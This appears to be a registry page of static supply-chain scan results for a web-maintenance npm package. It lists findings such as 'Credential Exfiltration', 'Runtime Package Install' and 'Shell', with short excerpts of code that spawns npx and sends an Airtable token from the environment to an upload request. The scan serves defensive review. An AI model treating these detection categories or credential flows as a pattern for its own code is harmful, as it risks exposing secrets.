registry  /  @reddoorla/maintenance  /  0.67.0

@reddoorla/maintenance@0.67.0

Canonical maintenance configs, audits, and recipes for the reddoor stack.

Static Scan Results

scanned 3d ago · by rust-scanner

Static analysis flagged 13 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessCryptoDynamicRequireEnvironmentVarsFilesystemNetworkShell
Supply chain
HighEntropyStringsObfuscatedUrlStrings
ManifestNo manifest risk signals triggered.
scanned 86 file(s), 412 KB of source, external domains: api.github.com, api.netlify.com, content.airtable.com, developer.chrome.com, docs.renovatebot.com, github.com, images.prismic.io, player.vimeo.com, reddoor-maintenance.netlify.app, searchconsole.googleapis.com, static.cdn.prismic.io, www.googleapis.com, x.invalid

Source & flagged code

4 flagged · loading source
dist/chunk-ZO7WNY57.jsView file
104try { L105: const { code, stderr } = await spawn( L106: "npx",
High
Child Process

Package source references child process execution.

dist/chunk-ZO7WNY57.jsView on unpkg · L104
104try { L105: const { code, stderr } = await spawn( L106: "npx", ... L116: if (e.code === "ENOENT" || /ENOENT/.test(String(err))) { L117: return { ran: false, stderr: "npx unavailable" }; L118: }
High
Runtime Package Install

Package source invokes a package manager install command at runtime.

dist/chunk-ZO7WNY57.jsView on unpkg · L104
dist/chunk-7MJJEEII.jsView file
31if (input.fleet === "airtable") { L32: const { openBase, readAirtableConfig } = await import("./client-EPVO3FEH.js"); L33: const { fromAirtableBase } = await import("./airtable-33SY2UBZ.js");
Medium
Dynamic Require

Package source references dynamic require/import behavior.

dist/chunk-7MJJEEII.jsView on unpkg · L31
dist/chunk-SYTPVYIK.jsView file
34launchHeading: "LAUNCHED", L35: launchBody: "Your site is live. We've set it up on the Reddoor stack with hosting, security, and automatic maintenance so it stays fast and healthy. Here's what's in place:", L36: launchSetupItems: [ ... L174: <mj-text color="${RED}" font-size="20px" font-weight="700" padding-top="${labelTop}">LIGHTHOUSE SCORES*</mj-text>${rows} L175: <mj-text color="${GREY}" font-family="helvetica, sans-serif" font-size="12px" font-weight="300" padding-top="24px" padding-bottom="${footnoteBottom}" line-height="20px">*A Lighthou... L176: </mj-column> ... L549: const start = bytes[0] === 239 && bytes[1] === 187 && bytes[2] === 191 ? 3 : 0; L550: const head = Buffer.from(bytes.slice(start, start + 64)).toString("ascii").replace(/^[\s]+/, "").toLowerCase(); L551: return head.startsWith("<!doctype html") || head.startsWith("<html") || head.startsWith("<head"); ... L571: async function uploadAttachment(recordId, fieldName, body, filename, contentType) { L572: const apiKey = process.env.AIRTABLE_PAT; L573: const baseId = process.env.AIRTABLE_BASE_ID;
High
Credential Exfiltration

Source combines credential-like environment material and outbound requests; review data flow before blocking.

dist/chunk-SYTPVYIK.jsView on unpkg · L34

Findings

4 High4 Medium5 Low
HighChild Processdist/chunk-ZO7WNY57.js
HighShell
HighCredential Exfiltrationdist/chunk-SYTPVYIK.js
HighRuntime Package Installdist/chunk-ZO7WNY57.js
MediumDynamic Requiredist/chunk-7MJJEEII.js
MediumNetwork
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowScripts Present
LowFilesystem
LowObfuscated
LowHigh Entropy Strings
LowUrl Strings